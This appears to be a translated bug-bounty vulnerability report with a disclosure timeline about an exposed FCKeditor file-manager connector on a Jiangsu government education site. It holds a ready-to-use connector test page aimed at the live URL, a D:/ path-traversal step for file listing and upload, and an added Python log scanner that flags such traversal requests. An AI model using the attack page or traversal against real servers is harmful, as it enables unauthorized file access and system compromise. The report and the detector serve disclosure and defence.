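2014-01-16: Details reported to the vendor; awaiting vendor handling
2014-01-21: Vendor confirmed; details disclosed to the vendor only
2014-01-31: Details disclosed to core white hats and experts in related fields
2014-02-10: Details disclosed to regular white hats
2014-02-20: Details disclosed to intern white hats
2014-03-02: Details disclosed to the public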
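Jiangsu Provincial Higher Education Enrollment and Employment Guidance Service Center: editor vulnerability leads to system compromise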
http://www.91job.gov.cn:2008/fckeditor/editor/filemanager/connectors/aspx/connector.aspx
The exploit code is as follows:
<!--
 * FCKeditor - The text editor for Internet - http://www.fckeditor.net
 * Copyright (C) 2003-2007 Frederico Caldeira Knabben
 *
 * == BEGIN LICENSE ==
 *
 * Licensed under the terms of any of the following licenses at your
 * choice:
 *
 *  - GNU General Public License Version 2 or later (the "GPL")
 *    http://www.gnu.org/licenses/gpl.html
 *
 *  - GNU Lesser General Public License Version 2.1 or later (the "LGPL")
 *    http://www.gnu.org/licenses/lgpl.html
 *
 *  - Mozilla Public License Version 1.1 or later (the "MPL")
 *    http://www.mozilla.org/MPL/MPL-1.1.html
 *
 * == END LICENSE ==
 *
 * Test page for the File Browser connectors.
-->
<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.0 Transitional//EN">
<html xmlns="http://www.w3.org/1999/xhtml">
<head>
  <title>FCKeditor - Connectors Tests</title>
  <script type="text/javascript">
function BuildBaseUrl( command )
{
  var sUrl =
    document.getElementById('cmbConnector').value +
    '?Command=' + command +
    '&Type=' + document.getElementById('cmbType').value +
    '&CurrentFolder=' + encodeURIComponent(document.getElementById('txtFolder').value) ;
  return sUrl ;
}

function SetFrameUrl( url )
{
  document.getElementById('eRunningFrame').src = url ;
  document.getElementById('eUrl').innerHTML = url ;
}

function GetFolders()
{
  SetFrameUrl( BuildBaseUrl( 'GetFolders' ) ) ;
  return false ;
}

function GetFoldersAndFiles()
{
  SetFrameUrl( BuildBaseUrl( 'GetFoldersAndFiles' ) ) ;
  return false ;
}

function CreateFolder()
{
  var sFolder = prompt( 'Type the folder name:', 'Test Folder' ) ;
  if ( ! sFolder )
    return false ;
  var sUrl = BuildBaseUrl( 'CreateFolder' ) ;
  sUrl += '&NewFolderName=' + encodeURIComponent( sFolder ) ;
  SetFrameUrl( sUrl ) ;
  return false ;
}

function OnUploadCompleted( errorNumber, fileName )
{
  switch ( errorNumber )
  {
    case 0 :
      alert( 'File uploaded with no errors' ) ;
      break ;
    case 201 :
      GetFoldersAndFiles() ;
      alert( 'A file with the same name is already available. The uploaded file has been renamed to "' + fileName + '"' ) ;
      break ;
    case 202 :
      alert( 'Invalid file' ) ;
      break ;
    default :
      alert( 'Error on file upload. Error number: ' + errorNumber ) ;
      break ;
  }
}

this.frames.frmUpload = this ;

function SetAction()
{
  var sUrl = BuildBaseUrl( 'FileUpload' ) ;
  document.getElementById('eUrl').innerHTML = sUrl ;
  document.getElementById('frmUpload').action = sUrl ;
}
  </script>
</head>
<body>
  <table height="100%" cellspacing="0" cellpadding="0" width="100%" border="0">
    <tr>
      <td>
        <table cellspacing="0" cellpadding="0" border="0">
          <tr>
            <td>
              Connector:<br />
              <select id="cmbConnector" name="cmbConnector">
                <option value="http://www.91job.gov.cn:2008/fckeditor/editor/filemanager/connectors/aspx/connector.aspx" selected="selected">ASP.Net</option>
              </select>
            </td>
            <td> </td>
            <td>
              Current Folder<br />
              <input id="txtFolder" type="text" value="/" name="txtFolder" /></td>
            <td> </td>
            <td>
              Resource Type<br />
              <select id="cmbType" name="cmbType">
                <option value="File" selected="selected">File</option>
                <option value="Image">Image</option>
                <option value="Flash">Flash</option>
                <option value="Media">Media</option>
                <option value="Invalid">Invalid Type (for testing)</option>
              </select>
            </td>
          </tr>
        </table>
        <br />
        <table cellspacing="0" cellpadding="0" border="0">
          <tr>
            <td valign="top">
              <a href="#" onclick="GetFolders();">Get Folders</a></td>
            <td> </td>
            <td valign="top">
              <a href="#" onclick="GetFoldersAndFiles();">Get Folders and Files</a></td>
            <td> </td>
            <td valign="top">
              <a href="#" onclick="CreateFolder();">Create Folder</a></td>
            <td> </td>
            <td valign="top">
              <form id="frmUpload" action="" target="eRunningFrame" method="post" enctype="multipart/form-data">
                File Upload<br />
                <input id="txtFileUpload" type="file" name="NewFile" />
                <input type="submit" value="Upload" onclick="SetAction();" />
              </form>
            </td>
          </tr>
        </table>
        <br />
        URL: <span id="eUrl"></span>
      </td>
    </tr>
    <tr>
      <td height="100%" valign="top">
        <iframe id="eRunningFrame" src="javascript:void(0)" name="eRunningFrame" width="100%" height="100%"></iframe>
      </td>
    </tr>
  </table>
</body>
</html>
Entering D:/ in the Current Folder field reproduces the effect.
As shown above.
Fix the editor.
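Added example (not part of the original report): a log review to run alongside the fix, flagging requests to the FCKeditor connector whose CurrentFolder is anything other than a plain virtual path, such as the D:/ value described above. The IIS W3C field layout, the sample log lines and the function names are assumptions constructed for illustration.

```python
import re
from urllib.parse import parse_qs

# FCKeditor file-manager connector endpoints (aspx, asp, php, ...).
CONNECTOR = re.compile(r"/editor/filemanager/connectors/[^/]+/connector\.\w+$", re.I)
# Constructed sample in IIS W3C format; client IPs are documentation ranges.
SAMPLE_LOG = """\
#Fields: date time cs-method cs-uri-stem cs-uri-query c-ip sc-status
2024-05-01 09:12:01 GET /fckeditor/editor/filemanager/connectors/aspx/connector.aspx Command=GetFoldersAndFiles&Type=Image&CurrentFolder=%2Fnews%2F 192.0.2.10 200
2024-05-01 23:40:17 GET /fckeditor/editor/filemanager/connectors/aspx/connector.aspx Command=GetFoldersAndFiles&Type=File&CurrentFolder=D%3A%2F 198.51.100.7 200
2024-05-01 23:41:02 GET /fckeditor/editor/filemanager/connectors/aspx/connector.aspx Command=GetFolders&Type=File&CurrentFolder=%2F..%2F..%2F 198.51.100.7 200
2024-05-01 23:45:00 GET /index.aspx - 192.0.2.10 200
"""


def folder_problems(folder):
    """Reasons a decoded CurrentFolder value is not a plain virtual path."""
    problems = []
    if re.match(r"[A-Za-z]:", folder):
        problems.append("drive-letter path")
    if "\\" in folder:
        problems.append("backslash")
    if ".." in folder.replace("\\", "/").split("/"):
        problems.append("parent-directory segment")
    if not folder.startswith("/"):
        problems.append("not rooted at /")
    return problems


def scan_iis_log(lines):
    """Return (client_ip, timestamp, command, folder, reasons) per suspicious connector hit."""
    fields, findings = [], []
    for line in lines:
        line = line.strip()
        if line.startswith("#Fields:"):
            fields = line.split()[1:]  # column names for the rows that follow
            continue
        if not line or line.startswith("#") or not fields:
            continue
        row = dict(zip(fields, line.split()))
        if not CONNECTOR.search(row.get("cs-uri-stem", "")):
            continue
        # parse_qs percent-decodes values; parameter names are compared in lower case.
        params = {k.lower(): v[0] for k, v in parse_qs(row.get("cs-uri-query", "")).items()}
        folder = params.get("currentfolder", "")
        reasons = folder_problems(folder)
        if reasons:
            findings.append((row.get("c-ip"), f"{row.get('date')} {row.get('time')}", params.get("command"), folder, reasons))
    return findings
```

A request with no CurrentFolder parameter at all is also reported, since an empty value is not rooted at /.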
Severity: High
Vulnerability Rank: 12
Confirmation time: 2014-01-21 08:33
None yet.